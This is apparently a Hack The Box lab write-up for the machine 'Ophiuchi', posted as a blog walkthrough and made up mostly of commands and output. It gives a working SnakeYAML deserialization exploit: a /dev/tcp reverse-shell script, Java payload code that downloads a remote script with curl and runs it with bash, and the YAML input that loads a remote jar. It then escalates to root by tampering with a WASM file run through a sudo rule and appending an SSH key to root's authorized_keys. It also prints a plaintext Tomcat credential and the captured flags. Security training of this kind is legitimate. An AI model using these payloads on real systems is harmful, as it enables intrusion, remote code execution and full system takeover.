Ophiuchi

Hack The Box Machines No Comments
$ sudo nmap -p- -T4 -A 10.10.10.227
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-title: Parse YAML

$ dirb 10.10.10.227:8080

$ nikto -h 10.10.10.227:8080
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 9 item(s) reported on remote host

$ echo "10.10.10.227 ophiuchi.htb" | sudo tee -a /etc/hosts
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/mbechler/marshalsec
https://github.com/artsploit/yaml-payload

SnakeYAML deserialization exploit

git clone https://github.com/artsploit/yaml-payload
revshell.sh
#!/bin/sh
bash -i >& /dev/tcp/10.10.14.149/8888 0>&1
edit AwesomeScriptEngineFactory.java file to execute are desired commands.
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl http://10.10.14.149/mash.sh -o /tmp/mash.sh");
            Runtime.getRuntime().exec("bash /tmp/mash.sh");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
... ...
create java payload file:
$cd yaml-payload
$javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
$jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1671) (out= 701)(deflated 58%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1568) (out= 413)(deflated 73%)

start a python web server at port 80 and listener at port 8888
$python3 -m http.server 80
$nc -lvnp 8888
submit the following YAML into the parser http://ophiuchi.htb:8080/ to get rce
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.149/yaml-payload.jar"]
  ]]
]
Due to security reason this feature has been temporarily on hold. We will soon fix the issue!
listening on [any] 8888 ...
$ nc -lvnp 8888
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.227] 46010
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@ophiuchi:/$ 
tomcat@ophiuchi:/home/admin$ ls -la
-r-------- 1 admin admin   33 Apr 29 13:30 user.txt
tomcat@ophiuchi:~/conf$ less tomcat-users.xml
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
$ ssh admin@10.10.10.227
admin@ophiuchi:~$ cat user.txt
6b75f38db920b0d58606464a53d9d3aa
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

admin@ophiuchi:/opt/wasm-functions$ cat index.go
package main

import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
)


func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")

        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result,_ := init()
        f := result.String()
        if (f != "1") {
                fmt.Println("Not ready to deploy")
        } else {
                fmt.Println("Ready to deploy")
                out, err := exec.Command("/bin/sh", "deploy.sh").Output()
                if err != nil {
                        log.Fatal(err)
                }
                fmt.Println(string(out))
        }
}
admin@ophiuchi:/tmp$ mkdir fuzi
admin@ophiuchi:/tmp$ cd fuzi
admin@ophiuchi:/tmp/fuzi$ cp /opt/wasm-functions/main.wasm ./
admin@ophiuchi:/tmp/fuzi$ vi deploy.sh
admin@ophiuchi:/tmp/fuzi$ cat deploy.sh 
#1/bin/sh
echo $(id)
Not ready to deploy
Wasm is short for WebAssembly. WebAssembly is an open standard that defines a portable binary-code format for executable programs, and a corresponding textual assembly language, as well as interfaces for facilitating interactions between such programs and their host environment. The text readable format of WASM binary is WAT(Web Assembly Text).
install the toolsuit https://github.com/webassembly/wabt 
We have 2 binaries wasm2wat and wat2wasm that we can use to manipulate the value of f editing the wasm file in this format.
We transfer the main.wasm file from the target machine to our local machine using nc
admin@ophiuchi:/tmp/fuzi$ cat main.wasm | nc 10.10.14.149 4444 
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ nc -lvnp 4444 > main.wasm
listening on [any] 4444 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.227] 50846

kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ ./wasm2wat main.wasm >main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ vi main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 1)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ ./wat2wasm main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ scp main.wasm admin@10.10.10.227:/tmp/fuzi
admin@10.10.10.227's password: 
main.wasm                                                                                                                                        100%  112     4.2KB/s   00:00    
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ 
admin@ophiuchi:/tmp/fuzi$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
uid=0(root) gid=0(root) groups=0(root)
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat ~/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali
admin@ophiuchi:/tmp/fuzi$ vi deploy.sh 
admin@ophiuchi:/tmp/fuzi$ cat deploy.sh 
#1/bin/sh
echo $(id)
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali" >> /root/.ssh/authorized_keys
admin@ophiuchi:/tmp/fuzi$
admin@ophiuchi:/tmp/fuzi$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
uid=0(root) gid=0(root) groups=0(root)

admin@ophiuchi:/tmp/fuzi$
kali@kali:~/0.htb/machines/Ophiuchi227$ ssh root@ophiuchi.htb
The authenticity of host 'ophiuchi.htb (10.10.10.227)' can't be established.
ECDSA key fingerprint is SHA256:OmZ+JsRqDVNaBWMshp7wogZM0KhSKkp1YmaILhRxSY0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ophiuchi.htb' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 29 Apr 2021 04:31:02 PM UTC

  System load:             0.02
  Usage of /:              19.9% of 27.43GB
  Memory usage:            11%
  Swap usage:              0%
  Processes:               222
  Users logged in:         1
  IPv4 address for ens160: 10.10.10.227
  IPv6 address for ens160: dead:beef::250:56ff:feb9:e13b


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Feb  5 17:51:32 2021
root@ophiuchi:~# whoami
root
root@ophiuchi:~# ls -la
total 44
drwx------  8 root root 4096 Jan  7 09:10 .
drwxr-xr-x 20 root root 4096 Feb  5 18:10 ..
lrwxrwxrwx  1 root root    9 Oct 14  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Oct 19  2020 .cache
drwxr-xr-x  4 root root 4096 Oct 14  2020 .cargo
drwxr-xr-x  4 root root 4096 Oct 14  2020 go
drwxr-xr-x  3 root root 4096 Oct 12  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-r--------  1 root root   33 Apr 29 13:30 root.txt
drwxr-xr-x  3 root root 4096 Oct 11  2020 snap
drwx------  2 root root 4096 Oct 11  2020 .ssh
lrwxrwxrwx  1 root root    9 Jan  7 09:10 .viminfo -> /dev/null
root@ophiuchi:~# cat root.txt
80aebbdd868c16c3bc710d7af750e414
root@ophiuchi:~#

Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation